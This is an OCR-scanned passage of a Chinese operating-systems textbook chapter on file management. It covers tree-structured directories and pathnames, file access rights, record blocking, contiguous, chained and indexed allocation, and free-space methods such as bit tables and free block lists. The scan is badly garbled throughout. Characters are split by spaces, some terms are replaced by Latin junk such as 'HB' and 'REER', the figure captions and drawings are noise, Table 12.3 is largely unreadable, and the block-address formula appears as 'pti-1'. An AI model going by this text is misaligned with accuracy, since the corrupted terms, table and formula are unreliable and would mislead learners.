唯一 性 成 为 一 个 严重 的 问题 。 此 外 , 如果 目录 中 没有 内 在 的 结构 ,很 难 对 用 户 隐藏 整个 且 录 的 某 
些 部 分 。 

解决 这 些 问 题 的 出 发 点 是 两 级 方案 。 在 这 种 情况 下 , 每 个 用 户 都 有 一 个 目录 , 还 有 一 个 主 目 
录 。 主 目录 有 每 个 用 户 目 录 的 目录 项 ,并 提供 地 址 和 访问 控制 信息 。 每 个 用 户 目录 是 该 用 户 文件 
的 简单 列表 。 这 些 方案 意味 着 只 需要 在 每 个 用 户 的 文件 集合 中 保证 名 字 的 唯一 性 , 文件 系统 就 可 
以 很 容易 地 在 目录 上 实行 访问 限制 ， 但 是 ， 它 对 于 用 户 构造 文件 集合 没有 任何 帮助 。 

功能 更 强大 、 更 灵活 的 方法 是 层次 或 树 状 结构 方法 ( 如 图 12.4 所 示 )， 这 也 是 普遍 采用 的 一 
种 方法 。 和 前 面 一 样 ， 有 一 个 主 目录 , 它 的 下 面 是 许多 用 户 目录 , 每 个 用 户 且 录 依 次 又 有 子 目录 
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目录 项 和 文件 项 , 并 且 在 任何 一 级 都 是 这 样 。 也 就 是 说 , 在 任何 一 级 ,一 个 目录 都 可 以 包括 子 目录 的 


目录 项 和 /或 文件 项 。 
目录 和 子 目录 是 如 何 组 织 的 将 在 后 面 阐述 。 当 然 ， 最 简 Ti 

单 的 方法 是 把 每 个 目录 保存 成 顺序 文件 。 当 目录 包含 很 多 目 

录 项 时 ， 这 样 的 组 织 可 能 会 导致 不 必要 的 很 长 的 查找 时 间 。 zA aie FHR 

在 这 种 情况 下 ， 最 好 采用 散 列 结构 。 LN 

12.3.3 命名 FAR oe 
用 户 通过 符号 名 字 来 引用 文件 。 显 然 ， 为 了 保证 文件 引 

用 无 二 义 性 ， 系 统 中 的 每 个 文件 都 必须 具有 唯一 的 名 字 。 另 ”文件 Te 和 件 


一 方面 ， 对 用 户 而 言 ， 要 求 为 文件 提供 一 个 唯一 的 名 字 是 一 p 
个 难以 接受 的 负担 ， 特 别 是 在 共享 系统 中 。 IA MPNA 

使 用 树 状 结构 目录 减 小 了 提供 唯一 名 字 这 方面 的 困难 。 系 统 中 的 任何 文件 可 以 按照 从 根 目录 
或 主 目录 向 下 到 各 个 分 支 , 最 后 直到 该 文件 的 路 径 来 定位 。 这 一 系列 目录 名 和 最 后 到 达 的 文件 名 组 
成 了 该 文件 的 路 径 名 (pathname )。 例 如 , 图 12.5 中 左下 角 的 文件 的 路 径 名 为 /User_B/Word/Unit 
_A/ABc， 斜 线 用 于 划 定 这 个 序列 中 各 个 名 字 的 界限 。 由 于 所 有 路 径 都 从 主 目录 开始 ， 主 目录 名 是 
隐 含 的 。 注 意 ， 在 这 种 情况 下 ， 多 个 文件 可 以 有 相同 的 文件 各 ， 只 要 保证 它们 的 路 径 名 是 唯一 的 即 
可 。 因 此 , 系统 中 可 以 存在 另外 一 个 名 为 ABC 的 文件 , 但 是 这 个 文件 的 路 径 名 为 /User_B/Draw/ABC。 


由 






a 
| 路 径 名 : /User_B/Draw /ABC 
路 径 名 : /User_B/Word/Unit_A/ABC 


图 12.5 树 状 结构 目录 的 一 个 例子 。。 .… oer 


尽管 路 径 名 使 得 文件 名 的 选择 变 得 容易 ,但 如 果 要 求 用 户 在 每 次 访问 tpi 
整 的 路 径 名 ， 则 还 是 比较 难 用 的 。 典 型 情况 下 ,对 交互 用 户 或 进程 而 言 ， 总 有 一 个 当前 路 径 与 之 
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相关 联 ， 通 常 称 做 工作 目录 (working directory )。 文 件 通常 按照 相对 于 工作 目录 的 方式 被 访问 ， 
例如 ， 如 果 用 户 B 的 工作 上 自 录 是 “Word”"， 则 路 径 名 Unit_A/ABC 足以 确定 图 12.5 中 最 左下 角 
处 的 文件 。 当 交互 式 用 户 登 录 进来 时 , 或 者 当 创 建 一 个 进程 时 ， 默认 的 工作 目录 是 用 户 目录 。 在 
执行 过 程 中 ， 用 户 可 以 在 树 中 向 上 或 向 下 漫游 ， 来 定义 不 同 的 工作 目录 。 


12.4 文件 共享 


在 多 用 户 系 统 中 , 几乎 总 是 要 求 允 许 文 件 在 多 个 用 户 间 共 享 。 这 时 就 产生 了 两 个 问题 : 访问 
权限 和 对 同时 访问 的 管理 。 


12.4.1 访问 权限 


文件 系统 应 该 为 允许 在 多 个 用 户 间 广泛 地 共享 文件 提供 灵活 的 工具 .文件 系统 应 该 提供 一 些 
选项 , 使 得 访问 某 个 特定 文件 的 方式 可 以 被 控制 。 在 典型 情况 下 , 用户 或 用 户 组 可 以 被 授予 某 些 
对 文件 的 访问 权限 。 已 经 使 用 的 访问 权限 有 很 多 , 下 面 列 出 的 是 一 些 可 以 指定 给 某 个 特定 用 户 以 
访问 某 个 特定 文件 的 具有 代表 性 的 访问 权限 : 

@ 无 (none): 用 户 其 至 不 知道 文件 是 否 存在 ， 更 不 必 说 访问 它 了 。 为 实施 这 种 限制 ， 不 

允许 用 户 读 包 含 该 文件 的 用 户 目录 。 
© HB (knowledge): 用 户 可 以 确定 文件 是 否 存 在 以 及 其 所 有 者 。 用 户 可 以 向 所 有 者 请 求 
更 多 的 访问 权限 。 

@ 执行 (execution): 用 户 可 以 加 载 并 执行 一 个 程序 ， 但 是 不 能 复制 它 。 私 有 程序 通常 具 
有 这 种 访问 限制 。 

@ if (reading): 用 户 能 够 以 任何 目的 读 文件 ， 包 括 复 制 和 执行 。 有些 系统 还 可 以 区 分 浏 
览 和 复制 , 对 于 前 一 种 情况 , 文件 的 内 容 可 以 呈现 给 用 户 , 但 用 户 却 没有 办 法 进行 复制 。 

e 追加 (appending): 用 户 可 以 给 文件 添加 数据 ， 通 常 只 能 在 末尾 追加 ， 但 不 能 修改 或 删 

. 除 文 件 的 任何 内 容 。 当 在 许多 资源 中 收集 数据 时 ， 这 种 权限 非常 有 用 。 

@ 更 新 ‘updating): 用 户 可 以 修改 、 删 除 和 增加 文件 中 的 数据 。 这 通常 包括 最 初 写 文件 、 

完全 重 写 或 部 分 重 写 、 移 去 所 有 或 部 分 数据 。 一 些 系统 还 区 分 不 同 程度 的 更 新 。 

@ HERI (changing protection): 用 户 可 以 改变 授予 其 他 用 户 的 访问 权限 。 典 型 地 ， 只 有 

文件 的 所 有 者 才 具 备 这 项 权力 。 在 某 些 系统 中 ， 所 有 者 可 以 把 这 项 权力 扩展 到 其 他 用 户 。 
为 防止 滥用 这 种 机 制 ， 文 件 的 所 有 者 通常 能 够 指定 该 项 权力 的 持 有 者 可 以 改变 哪些 权限 。 

o 删除 (deletion): 用 户 可 以 从 文件 系统 中 删除 该 文件 。 

这 些 权限 构成 了 一 个 层次 ,每 项 权限 都 隐 含 着 它 前 面 的 那些 权限 。 因 此 ， 如 果 一 个 特定 的 用 户 
被 授予 对 某 个 文件 的 修改 权限 ,该 用 户 也 就 同时 被 授予 以 下 权限 : 知道 、 执 行 、 读 和 追加 。 

一 个 用 户 被 指定 成 某 个 给 定 文件 的 所 有 者 , 通常 是 最 初创 建文 件 的 那个 用 户 。 所 有 者 具有 前 
面 列 出 的 全 部 权限 ， 并 且 可 以 给 其 他 用 户 授 予 权限 。 访 问 可 以 提供 给 不 同类 的 用 户 : 

@ 特定 用 户 (specific user): 由 用 户 ID 号 指定 的 单个 用 户 。 

@ 用 户 组 Cuser group): 不 是 单个 定义 的 一 组 用 户 。 系 统 必 须 可 以 通过 某 种 方式 了 解 用 户 

组 的 所 有 成 员 。 
e 278 al: 访问 该 系统 的 所 有 用 户 。 这 些 是 公共 文件 。 


12.4.2 ”同时 访问 


如 果 允 许多 个 用 户 追 加 或 更 新 一 个 文件 , 操作 系统 或 文件 管理 系统 必须 强加 一 些 规范 。 一 种 
蛮 力 的 方法 是 当 用 户 修 改 文件 时 , 允许 用 户 对 整个 文件 加 锁 。 比 较 好 的 控制 粒度 是 在 修改 时 对 单 
个 记录 加 锁 。 实 际 上 ， 这 正 是 第 5 章 所 讨论 的 读者 - 写 者 问题 。 在 设计 共享 访问 能 力 时 必须 解决 
互 斥 问题 和 死 锁 问题 。 
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125 ”记录 组 块 


如 图 12.2 所 示 ， 记录 是 访问 结构 化 文件 的 逻辑 单元 , 而 块 是 与 二 级 存储 进行 IO 操作 的 基 
本 单位 。 为 执行 /O， 记 录 必 须 组 织 成 块 。 
这 里 需要 考虑 以 下 几 个 问题 。 首 先 ， 块 的 长 度 是 固定 的 还 是 可 变 的 ? 在 大 多 数 系 统 中 ， 块 是 
固定 长 度 的 ， 这 可 以 简化 WO、 内 存 中 缓冲 区 的 分 配 和 二 级 存储 中 的 块 的 组 织 。 其 次 ， 与 平均 记录 
大 小 相 比 ， 决 的 相对 大 小 是 多 少 ? 一 个 折衷 方案 是 ， 块 越 大 ， 一 次 VO 操作 所 传送 的 记录 就 越 多 。 
如 果 是 顺序 地 处 理 或 查找 文件 ， 这 显然 是 一 个 优点 ， 因 为 使 用 大 块 可 以 减少 IO 操作 ， 这 加 速 了 
处 理 。 另 一 方面 ， 如 果 是 随机 地 访问 文件 ， 并 且 没有 发 现任 何 局 部 性 ， 太 的 抉 会 导致 对 并 没有 使 
用 的 记录 的 不 必要 的 传输 。 但 是 ， 综 合 考虑 顺序 访问 的 频率 和 访问 的 局 部 性 潜能 ， 可 以 说 使 用 大 的 
块 能 减少 VO IERE 需要 注意 的 是 , 大 块 需 要 更 大 的 VO 缓冲 区 ， 从 而 使 缓冲 区 的 管理 更 加 困难 。 
对 于 给 定 的 块 大 小 ， 有 三 种 组 块 方法 : 
@ 固定 组 块 : 使 用 固定 长 度 的 记录 ， 并 且 若干 个 完整 的 记录 被 保存 在 一 个 块 中 。 在 每 个 决 
的 末尾 可 能 会 有 一 些 未 使 用 的 空间 ， 称 做 内 部 碎片 。 . 

o 可 变 发 度 跨越 式 组 块 : 使 用 长 度 可 变 的 记录 ， 并 且 紧 缩 到 块 中 ， 使 得 抉 中 没有 未 使 用 空 
间 。 因 此 ， 某 些 记 录 可 能 会 跨越 两 个 块 ， 通过 一 个 指向 后 继 抉 的 指针 连接 。 

© 可 变 长 度 非 跨 越 式 组 块 : 使 用 可 变 长 度 的 记录 , 但 并 不 采用 跨越 的 方式 。 如 果 下 一 个 记录 比 
块 中 剩余 的 未 使 用 空间 大 ， 则 无 法 使 用 这 一 部 分 ， 因 此 在 大 多 数 块 中 都 会 有 未 使 用 的 空间 。 

图 12.6 显示 了 这 些 方法 , 这 里 假设 文件 保存 在 磁盘 上 的 顺序 块 中 。 在 图 中 假设 文件 足够 大 ， 
可 以 跨越 两 个 磁道 。 即 使 使 用 其 他 一 些 文件 分 配方 案 ， 其 结果 也 不 会 改变 CH, 12.6 # )o 











可 变 组 块 : pour 
数据 N 由 于 记录 适应 大 小 产生 的 浪费 


E 由 于 硬件 设计 产生 的 间 阶 T EEEE 


: 大 小 所 产生 的 浪费 
由 于 块 适应 磁道 大 小 而 产生 的 浪费 


图 12.6 ”记录 组 块 的 方法 [ WIED87 ] 
,固定 组 块 是 记录 长 度 固定 的 顺序 文件 最 常用 的 方式 。 可 变 长 度 跨越 式 组 块 的 存储 效率 高 ,并 


日 ”相对 于 一 些 文件 系统 中 (如 UNIX 文件 系统 ) 把 文件 看 做 字 节 流 。 
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且 对 文件 大 小 没有 限制 , 但 是 这 种 技术 很 难 实现 。 跨 越 两 个 块 的 记录 需要 两 次 VO 操作， 并且 不 
论 如 何 组 织 , 文件 都 很 难 修改 。 可 变 长 度 非 跨越 式 组 块 会 导致 空间 的 浪费 , 并 且 限 制 记录 的 大 小 
不 能 超过 块 的 大 小 。 . 

如 果 采 用 记录 组 块 技术 , 记录 组 块 技术 和 虚 存 硬件 会 互相 影响 。 在 虚 存 环境 中 , 页 是 传送 的 
基本 单位 。 页 通常 很 小 , 以 至 对 于 非 跨越 式 组 块 ， 把 页 当做 块 处 理 是 不 现实 的 。 因 此 一 些 系统 把 
多 个 页 组 合 起 来 ， 为 文件 传送 创建 一 个 比较 大 的 块 。 该 方法 已 用 于 IBM 主机 中 的 VSAM 文件 。 


12.6 二 级 存储 管理 


在 二 级 存储 中 ， 一 个 文件 是 由 许多 块 组 成 的 。 操 作 系 统 或 文件 管理 系统 负责 给 文件 分 配 块 。 
这 引发 了 两 个 管理 问题 。 首 先 ， 二 级 存储 中 的 空间 必须 分 配给 文件 ; 其 次 , 必须 知道 哪些 空间 可 
以 用 来 分 配 。 下 面 将 会 看 到 , 这 两 个 问题 是 相关 的 , 即 文件 分 配 采 用 的 方法 可 能 会 影响 空闲 空间 
管理 的 方法 。 此 外 ， 文 件 结构 和 分 配 策略 之 间 也 是 互相 影响 的 。 

本 节 首 先 讨 论 单个 磁盘 上 的 文件 分 配方 法 , 然后 讲述 空闲 空间 的 管理 问题 , 最 后 讨论 可 靠 性 
问题 。 


12.6.1 文件 分 配 


文件 分 配 涉及 以 下 几 个 问题 : 

1 ) 当 创 建 一 个 新 文件 时 ， 是 否 一 次 性 地 给 它 分 配 所 需要 的 最 大 空间 ? 

2) 给 文件 分 配 的 空间 是 一 个 或 多 个 连续 的 单元 ， 这 些 单元 称 做 分 区 。 也 就 是 说 ,分 区 是 一 
组 连续 的 已 经 分 配 了 的 块 。 一 个 分 区 的 大 小 可 以 从 一 块 到 整个 文件 。 在 分 配 文件 时 ,分 
区 的 大 小 应 该 是 多 少 ? 

3 ) 为 跟踪 分 配给 文件 的 分 区 , 应 该 使 用 哪 种 数据 结构 或 表 ? 在 DOS 或 其 他 系统 中 , 这 种 表 
通常 称 做 文件 分 配 表 ( File Allocation Table, FAT )。 

下 面 依次 分 析 这 些 问题 。 


预 分 配 与 动态 分 配 
预 分 配 策略 要 求 在 发 出 创建 文件 的 请 求 时 声明 该 文件 的 最 大 大 小 。 在 许多 情况 下 , 如 程序 编译 、 
产生 摘要 数据 文件 或 通过 通信 网 络 从 另 一 个 系统 中 传送 文件 时 ， 都 可 以 很 可 靠 地 估计 这 个 值 。 但 是 
对 许多 应 用 程序 ， 如 果 不 能 可 靠 地 估计 文件 可 能 的 最 大 大 小 ,就 很 难 实现 这 种 策略 。 在 这 种 情况 下 ， 
用 户 和 应 用 程序 都 会 多 估计 一 些 文件 的 大 小 ， 以 避免 分 配 的 空间 不 够 用 。 从 二 级 存储 分 配 的 角度 看 ， 
这 显然 是 非常 浪费 的 。 因 此 ， 使 用 动态 分 配 要 好 一 些 ， 动 态 分 配 只 有 在 需要 时 才 给 文件 分 配 空 间 。 
分 区 大 小 
第 二 个 问题 是 分 配给 文件 的 分 区 大 小 。 一 种 极端 情况 是 , 分 配 一 个 足够 大 的 分 区 , 可 以 保存 
整个 文件 ; 另 一 种 极端 情况 是 磁盘 空间 一 次 只 分 配 一 抉 。 因 此 , 在 选择 一 个 分 区 的 大 小 时 ,需要 
折衷 考虑 单个 文件 的 效率 和 整个 系统 的 效率 。[ WIED87 ] 给 出 了 需要 折衷 考虑 的 四 项 内 容 : 
1) 邻近 空间 可 以 提高 性 能 ,特别 是 对 于 Retrieve_Next 操作 ， 以 及 面向 事务 的 操作 系统 
中 运行 的 事务 。 
2) 数目 较 多 的 小 分 区 会 增加 用 于 管理 分 配 信 息 的 表 的 大 小 。 
3) 使 用 固定 大 小 的 分 区 ( 例如 块 ) 可 以 简化 空间 的 再 分 配 。 
4) 使 用 可 变 大 小 的 分 区 或 者 固定 大 小 的 小 分 区 可 以 减少 由 于 超额 分 配 而 产生 的 未 使 用 存储 
空间 的 浪费 。 
当然 ， 这 几 项 内 容 是 互相 影响 的 ， 必 须 统 一 考虑 。 其 结果 是 可 以 有 两 种 选择 
@ 可 变 的 、 大 规模 连续 分 区 : 可 以 提供 较 好 的 性 能 。 大 小 可 变 避 免 了 浪费 ， 并 且 使 文件 分 
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配 表 比 较 小 ， 但 是 这 又 导致 空间 很 难 再 次 利用 。 
@ R: 小 的 固定 分 区 提供 了 更 大 的 灵活 性 ,但 是 为 了 分 配 ， 它 们 可 能 需要 较 大 的 表 或 更 复 
杂 的 结构 。 邻 近 性 不 再 是 主要 目标 ， 而 是 根据 需要 来 分 配 块 。 
每 一 种 选择 都 适用 于 预 分 配 和 动态 分 配 。 对 于 可 变 的 、 大 规模 连续 分 区 , 一 个 文件 被 预 分 配 
给 一 组 连续 的 块 , 这 就 消除 了 对 文件 分 配 表 的 需求 , 它 所 需要 的 仅仅 是 指向 第 一 块 的 指针 和 分 配 
的 块 的 数目 。 一 次 性 地 分 配 所 有 分 区 所 需要 的 所 有 块 , 这 意味 着 该 文件 的 文件 分 配 表 将 保持 固定 
大 小 ， 这 是 因为 可 以 分 配 的 块 的 数量 是 一 定 的 。 
对 于 可 变 大 小 的 分 区 , 我 们 需要 考虑 空闲 空间 的 碎片 问题 。 这 个 问题 在 第 7 章 讨论 内 存 的 划 
分 时 已 经 讨论 过 。 一 些 可 能 的 选择 策略 如 下 : 
@ 首次 适 配 : 从 空闲 块 列表 中 选择 第 一 个 未 被 使 用 且 大 小 足够 的 连续 的 块 组 。 
@ REER: 选择 大 小 足够 的 未 使 用 过 的 块 中 最 小 的 一 个 。 
@ 最 近 适 配 : 选择 与 前 面 分 配给 该 文件 的 块 组 最 为 邻近 的 组 ， 其 目的 是 为 了 提高 局 部 性 。 
很 难说 哪 种 策略 是 最 好 的 , 其 困难 在 于 许多 因素 的 相互 作用 , 包括 文件 的 类 型 、 文 件 访问 的 
模式 、 多 道 程序 的 程度 、 系 统 中 的 其 他 性 能 因素 、 磁 盘 缓存、 磁盘 调度 等 。 


文件 的 分 配方 法 
前 面 讨论 了 预 分 配 和 动态 分 配 的 比较 以 及 分 区 大 小 等 问题 ,现在 需要 考虑 具体 的 文件 分 配方 
法 。 通 常 使 用 三 种 方法 : 连续 、 链 接 和 索引 。 表 12.3 总 结 了 每 种 方法 的 特点 。 


表 12.3 文件 分 配方 法 


| 连 a | aag | mG 
是 否 预 分 配 | 需要 | 可 能 | 可 能 
分 区 大 小 回 定 还 是 可 变 | 可 变 《| mer | me 可 变 
分 区 大 小 ae ae | 二 名 中 等 
分 配 频率 | -次 | 低 到 高 | 高 | 低 
分 配 需要 的 时 间 中 等 


文件 分 配 表 的 大 小 中 等 


连续 分 配 是 指 在 创建 文件 时 ， 给 文件 分 配 一 组 连续 的 块 ， 如 图 12.7 所 示 。 因 此 ， 这 是 一 种 
使 用 大 小 可 变 分 区 的 预 分 配 策略 。 在 文件 分 配 表 中 每 个 文件 只 需要 一 个 表 项 , 用 于 说 明 起 始 块 和 
文件 的 长 度 。 从 单个 顺序 文件 的 角度 看 ,连续 分 配 是 最 好 的 。 对 于 顺序 处 理 , 可 以 同时 读 入 多 个 
k, 从 而 提高 了 IO 性能。 同时 , 检索 一 个 块 也 是 非常 容易 的 。 例 如 ,如 果 一 个 文件 从 块 b 开始 ， 


文件 A 
C C N SS ES 
ooo om 
B 
o 1 : oi [C] 


is] C] 1 |] 877] 9 
xA a AZA uA 
23 269] 27 20] 

me Ee a 





图 12.7 连续 文件 分 配 





ENË CHF 385 


需要 文件 的 第 i 块 ， 则 这 一 块 在 二 级 存储 中 的 块 位 置 为 pti-1。 连 续 分 配 也 存在 一 些 问 题 。 首先， 
会 出 现 外 部 碎片 , 使 得 很 难 找到 空间 大 小 足够 的 连续 块 。 因 此, 它 时 常 需要 执行 紧缩 算法 来 释放 
磁盘 中 的 额外 空间 ， 如 图 12.8 所 示 。 其 次 ， 因 为 是 预 分 配 ， 它 需要 在 创建 文件 时 声明 文件 的 大 
小 ， 这 将 会 导致 在 前 面 已 经 讨论 过 的 问题 。 


文件 A 
SS USS (AS 3 :加 
B 
s « "ME 2 :9 


07 uk = pa oa ee 
GA 416) | 17 


Rg 21[ | ee is “[ |] 
sC] 26[] 0 29[_] 
sL aL 32f_] a3_] s_] 





12.8 ”连续 文件 分 配 ( 紧缩 后 ) 


与 连续 分 配 相对 的 另 一 个 极端 是 链接 分 配 ， 如 图 12.9 所 示 。 在 典型 情况 下 ， 链 接 分 配 基于 
单个 的 块 , 链 中 的 每 一 块 都 包含 指向 下 一 块 的 指针 。 文 件 分 配 表 中 每 个 文件 同样 只 需要 一 个 表 项 ， 
用 于 声明 起 始 块 和 文件 的 长 度 。 尽 管 可 以 是 预先 分 配 , 但 是 更 常用 的 是 根据 需要 来 分 配 块 。 块 的 
选择 非常 简单 : 任何 一 个 空闲 块 都 可 以 加 入 到 链 中 。 由 于 一 次 只 需要 一 个 块 , 因此 不 必 担 心 会 出 
现 外 部 碎片 。 这 种 类 型 的 物理 组 织 最 适合 于 顺序 处 理 的 顺序 文件 , 为 选择 文件 中 的 某 一 块 , 需要 
沿 着 链 向 下 ， 直 至 到 达 期 待 的 块 。 





w Jal] 22[__] 23 
2s[__] 26[__] 27[__] 28 
s al jC )a | |] 





图 12.9 ”链接 分 配 


链接 分 配 的 一 个 后 果 是 局 部 性 原理 不 再 适用 。 因 此 ， 如 果 需 要 像 顺 序 处 理 那 样 一 次 取信 一 个 文件 
中 的 多 个 块 ， 则 需要 一 连 串 地 访问 磁盘 的 不 同 部 分 。 这 对 于 单 用 户 系统 有 重大 的 影响 ， 也 是 共享 系统 
需要 关注 的 。 为 克服 这 个 问题 ， 一 些 系 统 周 期 性 地 对 文件 进行 合并 〈 consolidation )， 如 图 12.10 所 示 。 
索引 分 配 解 决 了 连续 分 配 和 链接 分 配 中 的 许多 问题 。 对 于 索引 分 配 , 每 个 文件 在 文件 分 配 表 
中 有 一 个 一 级 索引 。 分 配给 该 文件 的 每 个 分 区 在 索引 中 都 有 一 个 表 项 。 在 典型 情况 下 , 文件 索引 
在 物理 上 并 不 是 作为 文件 分 配 表 的 一 部 分 存储 的 ， 相 友 , 文件 的 索引 保存 在 一 个 单独 的 块 中 , 文 
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件 分 配 表 中 该 文件 的 表 项 指向 这 一 块 。 分 配 可 以 基于 固定 大 小 的 块 (如 图 12.11 所 示 )， 也 可 以 
基于 大 小 可 变 的 分 区 ( 如 图 12.12 所 示 )。 基 于 块 来 分 配 可 以 消除 外 部 碎片 ， 而 按 大 小 可 变 的 分 
区 分 配 可 以 提高 局 部 性 。 在 任何 一 种 情况 下 ,都 需要 不 时 地 进行 文件 整理 。 在 使 用 大 小 可 变 的 分 
区 的 情况 下 , 文件 整理 可 以 减少 索引 的 数目 , 但 对 于 基于 块 的 分 配 却 不 能 。 索 引 分 配 支 持 顺 序 访 
问 文件 和 直接 访问 文件 ， 因 而 是 最 普遍 的 一 种 文件 分 配 形式 。 


(JJ 1) A 
w uC uC | wu] 


二 wl JA aol jot J 
a lal jl Ja Td | 
2s{__] 26[_] DC 28{__] E 
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图 12.10 ”链接 分 配 〈 合并 后 ) 





12.11 ”基于 块 的 索引 分 配 





文件 分 配 表 


图 :12.12 ”基于 长 度 可 变 的 分 区 的 索引 分 配 
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12.6.2 ”空闲 空间 的 管理 


正如 分 配给 文件 的 空间 需要 管理 ， 当 前 还 没有 分 配给 任何 文件 的 空间 也 必须 管理 起 来 。 为 实现 
前 面 描述 的 任何 一 种 文件 分 配 技术 ， 必 须 首先 知道 磁盘 中 的 哪些 块 是 可 用 的 。 因 此 ， 除 了 文件 分 配 
表 以 外 ， 还 需要 一 个 磁盘 分 配 表 (Disk Allocation Table，DAT )。 下 面 介绍 一 些 已 经 实现 的 技术 。 
位 表 

这 种 方法 使 用 一 个 向 量 , 向 量 的 每 一 位 对 应 于 磁盘 中 的 每 一 块 。0 表示 一 个 空闲 块 ，1 表示 一 个 
已 使 用 的 块 。 例 如 ， 对 于 图 12.7 中 的 磁盘 布局 ， 需 要 一 个 长 度 为 35 的 向 量 ， 该 向 量具 有 以 下 值 ， 

00111000011111000011111111111011000 

位 表 的 优点 是 通过 它 可 以 相对 比较 容易 地 找到 一 个 或 一 组 连续 的 空闲 块 。 因 此 位 表 适 用 于 前 
面 描述 的 任何 一 种 文件 分 配方 法 。 它 的 另 一 个 优点 是 非常 小 。 尽 管 如 此 , 它 的 长 度 仍然 是 相当 大 
的 。 一 个 块 位 图 所 需要 的 存储 器 总 量 ( 单位 为 字 节 ) 为 : 

磁盘 大 小 ( 字 节 数 ) 
8x 文 件 系统 块 大 小 

因此 ， 对 于 一 个 16GB 的 磁盘 ， 块 大 小 为 512 个 字 节 ， 则 位 表 占 用 4MB 的 空间 。 我 们 是 否 可 以 
在 内 存 中 节省 出 4MB 的 空间 来 存放 这 个 位 表 ? 如 果 可 以 ， 那 么 不 需要 访问 磁盘 就 可 以 查找 这 个 
位 表 。 但 是 ， 即 使 相对 于 当今 的 内 存 大 小 ，4MB 对 实现 一 个 功能 来 说 仍然 是 很 大 的 一 块 空间 。 
另 一 种 方法 是 把 位 表 放 在 磁盘 中 , 但 是 4MB 的 位 表 需 要 大 约 8000 个 磁盘 块 , 我 们 不 能 容忍 当 需 
要 一 个 块 时 查找 那么 大 的 磁盘 空间 ， 因 此 ， 位 表 需 要 驻 留 在 内 存 中 。 

即使 位 表 在 内 存 中 , 穷 举 式 地 查找 这 个 表 也 会 使 文件 系统 的 性 能 降低 到 难以 接受 的 程度 , 当 
磁盘 空间 只 剩 下 很 少 的 空闲 块 时 这 个 问题 尤为 严重 。 因此 , 大 多 数 使 用 位 表 的 文件 系统 都 有 一 个 
辅助 数据 结构 ， 用 于 汇总 位 表 的 子 区 域 的 内 容 。 例 如 ， 位 表 可 以 在 逻辑 上 划分 成 许多 个 子 区 域 ， 
对 于 每 个 子 区 域 , 汇总 表 中 包括 它 的 空闲 块 的 数目 和 连续 空闲 块 的 最 大 长 度 。 当 文件 系统 需要 大 
量 的 连续 块 时 ， 它 可 以 通过 扫 找 汇总 表 来 发 现 适 合 的 子 区 域 ， 然 后 再 查找 这 个 子 区 域 。 
链接 空闲 区 

通过 使 用 指向 每 个 空闲 区 的 指针 和 它们 的 长 度 值 . 空闲 区 可 以 被 链接 在 一 起 。 由 于 不 需要 磁 
盘 分 配 表 , 仅 需 要 一 个 指向 链 的 开始 处 的 指针 和 第 一 个 分 区 的 长 度 , 因而 这 种 方法 的 空间 开销 是 
可 以 忽略 不 计 的 。 该 方法 适用 于 所 有 的 文件 分 配方 法 。 如 果 一 次 只 分 配 一 块 ， 只 要 简单 地 选择 链 
头 上 的 空闲 块 , 并 调整 第 一 个 指针 或 长 度 值 即 可 。 如 果 是 基于 可 变 分 区 进行 分 配 的 , 则 可 以 使 用 
首次 适 配 算法 : 从 头 开始 取 分 区 , 一 次 取 一 个 ,以 确定 链表 中 下 一 个 适合 的 空闲 块 。 这 时 同样 需 
要 调整 指针 和 长 度 。 

这 个 方法 具有 其 自身 的 问题 。 在 使 用 一 段 时 间 以 后 , 磁盘 会 出 现 很 多 碎片 , 许多 空闲 区 都 变 成 
了 只 有 一 个 块 那么 长 。 还 需要 注意 的 是 ， 每 次 分 配 一 个 块 时 ， 在 把 数据 写 到 这 个 块 中 之 前 ， 需 要 先 
读 这 个 块 , 以 发 现 指向 新 的 第 一 个 空闲 块 的 指针 。 如 果 需 要 为 一 个 文件 操作 同时 分 配 许多 单个 的 块 ， 
这 会 大 大 地 降低 创建 文件 的 速度 。 与 此 类 似 ， 删 除 -- 个 由 许多 碎片 组 成 的 文件 也 是 非常 耗 时 的 。 


索引 

索引 方法 把 空闲 空间 看 做 是 一 个 文件 , 并 使 用 一 个 在 文件 分 配 时 介绍 过 的 索引 表 。 基 于 效率 
方面 的 考虑 ,索引 应 该 基于 可 变 大 小 的 分 区 , 而 不 是 块 。 因此 , 磁盘 中 的 每 个 空闲 分 区 都 在 表 中 
有 一 个 表 项 。 该 方法 为 所 有 的 文件 分 配方 法 都 提供 了 有 效 的 支持 。 
空闲 块 列表 

在 这 个 方法 中 , 每 个 块 都 指定 一 个 顺序 号 , 所 有 空闲 块 的 顺序 号 保存 在 磁盘 中 的 一 个 保留 区 
中 。 根 据 磁 盘 的 大 小 , 存储 一 个 块 号 需要 24 位 或 32 位 , 故 空闲 块 列表 的 大 小 是 24 或 32 乘 以 相 
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应 的 位 表 大 小 , 因此 它 必 须 保 存在 磁盘 上 ， 而 不 是 内 存 中 。 但 这 是 一 种 非常 令 人 满意 的 方法 。 考 
虑 下 面 几 点 : 
1 ) 磁盘 上 用 于 空闲 块 列表 的 空间 小 于 磁盘 空间 的 1%。 如 果 使 用 32 位 的 块 号 ， 则 每 个 512 
字 节 的 块 需要 4 个 字 节 。 
2) 尽管 空闲 块 列表 太 大 了 ， 不 能 保存 在 内 存 中 ,但 是 ， 有 两 种 有 效 的 技术 可 以 把 该 表 的 一 
小 部 分 保存 在 内 存 中 。 
a) 这 个 表 可 以 看 做 是 一 个 下 推 栈 ( 见 附 录 1B), 栈 中 靠 前 的 数 千 个 元 素 可 以 保留 在 内 存 
中 。 当 分 配 一 个 新 块 时 ， 它 从 栈 顶 弹出 ,此 时 ， 它 是 在 内 存 中 的 。 与 此 类 似 ， 当 一 个 
块 被 解除 分 配 时 ,， 它 被 压 人 栈 中 。 只 有 当 栈 中 在 内 存 的 部 分 满 了 或 者 空 了 时 , 才 需 要 
在 内 存 和 磁盘 之 间 进 行 传送 。 因 此 ， 该 技术 在 大 多 数 时 候 都 提供 了 有 零 时 间 的 访问 。 
b) 这 个 表 可 以 看 做 是 一 个 FIFO 队列 ， 队 列 头 和 队列 尾 的 几 千 项 在 内 存 中 。 分 配 块 时 从 
队列 头 取 走 第 一 项 , 在 取消 分 配 时 可 以 把 它 添加 在 队列 尾 。 只 有 当 内 存 中 的 头 部 分 空 
了 ， 或 者 内 存 中 的 尾部 分 满 了 时 ， 才 需要 在 磁盘 和 内 存 之 间 传 送 数据 。 
不 论 前 面 给 出 孵 一 种 策略 ( 栈 或 FIFO 队列 )， 一 个 后 台 线 程 都 可 以 对 内 存 中 的 列表 慢 慢 地 
进行 排序 ， 从 而 使 连续 分 配 变 得 容易 。 


1263 卷 


